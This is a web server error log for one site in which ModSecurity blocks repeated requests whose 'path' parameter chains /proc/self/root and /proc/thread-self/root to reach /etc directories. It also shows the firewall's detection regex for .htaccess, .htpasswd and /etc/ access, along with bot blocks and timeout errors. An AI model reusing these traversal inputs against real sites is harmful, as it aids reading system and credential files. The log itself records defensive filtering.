[Thu Mar 19 00:59:34.385640 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:46942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0psdf6f5d65gmYZQipgAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:40.594688 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:52664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0rBkFeYa1D6dYQnCcRAAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:44.887498 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:52666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0sAbLMZ6AikZjR9UOVgAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:47.125022 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58952] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:59:51.785141 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.244.43:41684] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt0t_-YZRR_7pZ7nDI_ZQAAA8M"]
[Thu Mar 19 01:00:17.154168 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:00:28.366586 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:52666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt03AbLMZ6AikZjR9UOggAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:00:48.133816 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60824] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:01:21.130727 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33620] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:01:42.794865 2026] [core:alert] [pid 16140:tid 140411590858496] [client 57.141.18.114:39050] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:01:52.137850 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34722] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:02:18.065233 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35638] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:02:19.477232 2026] [mime_magic:error] [pid 16140:tid 140411574073088] (70014)End of file found: [client 57.141.18.72:40742] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:02:24.175655 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:46716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1UOoXxyEfFpUF8f_DawAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:02:24.640060 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.228.61:43284] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt1UP-YZRR_7pZ7nDI_tAAAA88"]
[Thu Mar 19 01:02:31.881347 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:50144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1V9a6ubjKNq_cu4bqBgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:02:33.775154 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:50144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1WNa6ubjKNq_cu4bqBwAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:02:40.141906 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36340] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:02:47.130796 2026] [core:alert] [pid 15826:tid 140411716749056] [client 57.141.18.23:41408] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:02:47.131153 2026] [core:alert] [pid 17653:tid 140411733534464] [client 57.141.18.81:41634] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:02:47.137822 2026] [core:alert] [pid 17887:tid 140411699963648] [client 57.141.18.55:41644] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:02:52.064019 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.243.128:49118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1bBkFeYa1D6dYQnCc_AAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:02:53.109224 2026] [core:alert] [pid 15051:tid 140411666392832] [client 57.141.18.123:41786] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:03:02.108055 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:03:05.974614 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:38518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1eeoXxyEfFpUF8f_DhQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:03:25.125804 2026] [proxy_fcgi:error] [pid 15051:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:03:27.683497 2026] [:error] [pid 27293:tid 140411649607424] [client 74.7.241.31:48664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1j_-YZRR_7pZ7nDI_5QAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:03:28.055477 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:38518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1kOoXxyEfFpUF8f_DmgAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:03:40.052015 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:54164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1nAkwaGbbGflqUZBiEQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:03:47.033858 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38728] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:03:48.220362 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.241.31:43034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1pAbLMZ6AikZjR9UPDwAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:03:51.174519 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.241.31:39328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt1pxkFeYa1D6dYQnCdIQAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:04:03.642245 2026] [core:alert] [pid 17653:tid 140411733534464] [client 74.7.243.128:60342] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware
[Thu Mar 19 01:04:09.133812 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39444] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:04:32.139676 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40282] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:04:47.809830 2026] [mime_magic:error] [pid 27293:tid 140411691570944] (70014)End of file found: [client 57.141.18.17:45812] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:04:53.787289 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.244.43:41462] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt15eyqAr6etmhZHNoWVgAAAEU"]
[Thu Mar 19 01:04:55.029820 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41044] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:05:18.157783 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41686] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:05:32.527643 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:39340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt2DMdf6f5d65gmYZQjoQAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:05:47.041904 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42558] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:06:20.131803 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43574] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:06:24.880023 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:42866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt2QAbLMZ6AikZjR9UPVAAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:06:34.187207 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.241.31:37246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt2Sv-YZRR_7pZ7nDJARgAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
